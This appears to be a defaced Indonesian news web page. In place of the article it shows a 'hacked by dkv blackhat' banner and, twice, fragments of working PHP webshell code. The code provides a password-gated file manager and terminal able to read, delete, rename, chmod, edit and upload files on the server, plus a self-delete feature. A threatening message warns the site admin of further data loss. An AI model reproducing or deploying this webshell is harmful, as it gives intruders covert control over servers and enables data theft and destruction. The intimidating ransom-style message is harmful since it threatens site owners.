hacked by dkv blackhat
hacked by dkv blackhat

By hacked by dkvblackhat 24 Agu 2026, 09:51:00 WIB Pendidikan
hacked by dkv blackhat

Gambar :

Self Delete Success

"); } if(!isset($_SESSION['login'])) { ?>DKV BLACKHAT LOGIN

DKV BLACKHAT V3.7



$error

";?>
$f,'type'=>is_dir($cwd.$f)?'folder':'file','size'=>is_dir($cwd.$f)?'-':@round(@filesize($cwd.$f)/1024,2).' KB','perm'=>@substr(sprintf('%o',@fileperms($cwd.$f)),-4)];} echo json_encode(['files'=>$files,'path'=>str_replace($root,'/',$cwd)]); exit; } if($_POST['action']=='cmd'){ $cmd=trim($_POST['cmd']); $parts=preg_split('/\s+/',$cmd,2); $c=$parts[0]; $a=$parts[1]??''; $out=''; if($c=='cd'){ $n=$a=='..'?realpath($cwd.'../'):realpath($cwd.$a); if($n&&strpos($n,$root)===0){$_SESSION['cwd']=$n.'/';$out="root@dkv:".str_replace($root,'/',$n);} else $out="bash: cd: $a: No such directory";} elseif($c=='rm'){ $f=$cwd.$a; $out=(is_dir($f)?@rmdir($f):@unlink($f))?"Removed: $a":"Permission denied";} elseif($c=='cat'){ $f=$cwd.$a; $out=file_exists($f)&&is_file($f)?htmlspecialchars(@file_get_contents($f)):"bash: cat: $a: No such file";} elseif($c=='rename'){ $p=explode(' ',$a,2); $out=@rename($cwd.$p[0],$cwd.$p[1])?"Renamed $p[0] -> $p[1]":"Rename failed";} elseif($c=='chmod'){ $p=explode(' ',$a,2); $out=@chmod($cwd.$p[1],octdec($p[0]))?"Chmod $p[1] -> $p[0]":"Chmod failed";} elseif($c=='pwd') $out=str_replace($root,'/',$cwd); elseif($c=='ls') { foreach(@scandir($cwd) as $f) if($f!='.') $out.=(is_dir($cwd.$f)?"[DIR] ":"[FILE] ").$f."\n"; if($out=='')$out='Folder kosong';} elseif($c=='clear') $out="CLEAR"; elseif($c=='help') $out="ls cd.. cat rm rename old new chmod 755 file pwd clear edit newfile newfolder help"; elseif($c=='edit') $_SESSION['edit']=$cwd.$a; else $out="bash: $c: command not found"; echo json_encode(['output'=>$out,'path'=>str_replace($root,'/',$cwd)]); exit; } if($_POST['action']=='save_file'){ @file_put_contents($_SESSION['edit'], $_POST['content']); echo json_encode(['status'=>'saved']); exit;} } if(isset($_FILES['file'])){ $t=$cwd.basename($_FILES['file']['name']); $msg=@move_uploaded_file($_FILES['file']['tmp_name'],$t)?"[OK] Upload Berhasil: ".basename($_FILES['file']['name']):"[!] Gagal Upload. chmod folder 755"; } if(isset($_POST['new_name'])){ $p=$cwd.$_POST['new_name']; $msg=$_POST['type']=='folder'? (@mkdir($p,0755)?"[OK] Folder Dibuat":"Gagal mkdir") : (@file_put_contents($p,'')?"[OK] File Dibuat":"Gagal create");} ?> HACKED BY DKV BLACKHAT & Pasuruan Sec Team SELF DELETE LOGOUT
Logo DKV

HACKED BY DKV BLACKHAT WEBSHELL

Dear Admin,
Tolong perbaiki system anda.
Jika tidak kami akan bertindak lebih jauh
hingga anda kehilangan data dan file penting.
$msg

";?>
:: FILE MANAGER REALTIME ::
Path: /
Loading...
DKV Terminal v3.7 > Ketik 'help' untuk bantuan
root@dkv:/#


 

Self Delete Success

"); } if(!isset($_SESSION['login'])) { ?>DKV BLACKHAT LOGIN

DKV BLACKHAT V3.7



 
$error

 

";?>

$f,'type'=>is_dir($cwd.$f)?'folder':'file','size'=>is_dir($cwd.$f)?'-':@round(@filesize($cwd.$f)/1024,2).' KB','perm'=>@substr(sprintf('%o',@fileperms($cwd.$f)),-4)];} echo json_encode(['files'=>$files,'path'=>str_replace($root,'/',$cwd)]); exit; } if($_POST['action']=='cmd'){ $cmd=trim($_POST['cmd']); $parts=preg_split('/\s+/',$cmd,2); $c=$parts[0]; $a=$parts[1]??''; $out=''; if($c=='cd'){ $n=$a=='..'?realpath($cwd.'../'):realpath($cwd.$a); if($n&&strpos($n,$root)===0){$_SESSION['cwd']=$n.'/';$out="root@dkv:".str_replace($root,'/',$n);} else $out="bash: cd: $a: No such directory";} elseif($c=='rm'){ $f=$cwd.$a; $out=(is_dir($f)?@rmdir($f):@unlink($f))?"Removed: $a":"Permission denied";} elseif($c=='cat'){ $f=$cwd.$a; $out=file_exists($f)&&is_file($f)?htmlspecialchars(@file_get_contents($f)):"bash: cat: $a: No such file";} elseif($c=='rename'){ $p=explode(' ',$a,2); $out=@rename($cwd.$p[0],$cwd.$p[1])?"Renamed $p[0] -> $p[1]":"Rename failed";} elseif($c=='chmod'){ $p=explode(' ',$a,2); $out=@chmod($cwd.$p[1],octdec($p[0]))?"Chmod $p[1] -> $p[0]":"Chmod failed";} elseif($c=='pwd') $out=str_replace($root,'/',$cwd); elseif($c=='ls') { foreach(@scandir($cwd) as $f) if($f!='.') $out.=(is_dir($cwd.$f)?"[DIR] ":"[FILE] ").$f."\n"; if($out=='')$out='Folder kosong';} elseif($c=='clear') $out="CLEAR"; elseif($c=='help') $out="ls cd.. cat rm rename old new chmod 755 file pwd clear edit newfile newfolder help"; elseif($c=='edit') $_SESSION['edit']=$cwd.$a; else $out="bash: $c: command not found"; echo json_encode(['output'=>$out,'path'=>str_replace($root,'/',$cwd)]); exit; } if($_POST['action']=='save_file'){ @file_put_contents($_SESSION['edit'], $_POST['content']); echo json_encode(['status'=>'saved']); exit;} } if(isset($_FILES['file'])){ $t=$cwd.basename($_FILES['file']['name']); $msg=@move_uploaded_file($_FILES['file']['tmp_name'],$t)?"[OK] Upload Berhasil: ".basename($_FILES['file']['name']):"[!] Gagal Upload. chmod folder 755"; } if(isset($_POST['new_name'])){ $p=$cwd.$_POST['new_name']; $msg=$_POST['type']=='folder'? (@mkdir($p,0755)?"[OK] Folder Dibuat":"Gagal mkdir") : (@file_put_contents($p,'')?"[OK] File Dibuat":"Gagal create");} ?>HACKED BY DKV BLACKHAT & Pasuruan Sec TeamCLICK FOR SOUNDSELF DELETE LOGOUT

Logo DKV

HACKED BY DKV BLACKHAT WEBSHELL

Dear Admin,
Tolong perbaiki system anda.
Jika tidak kami akan bertindak lebih jauh
hingga anda kehilangan data dan file penting.
$msg

 

";?>
:: FILE MANAGER REALTIME ::
Path: /
Loading...
CREATE
UPLOAD
 
???? SAVE FILE
DKV Terminal v3.7 > Ketik 'help' untuk bantuan
root@dkv:/#

WEBSITE INI DIRETAS OLEH DKV BLACKHAT




Video Terkait:


Write a Facebook Comment

Komentar dari Facebook

View all comments

Write a comment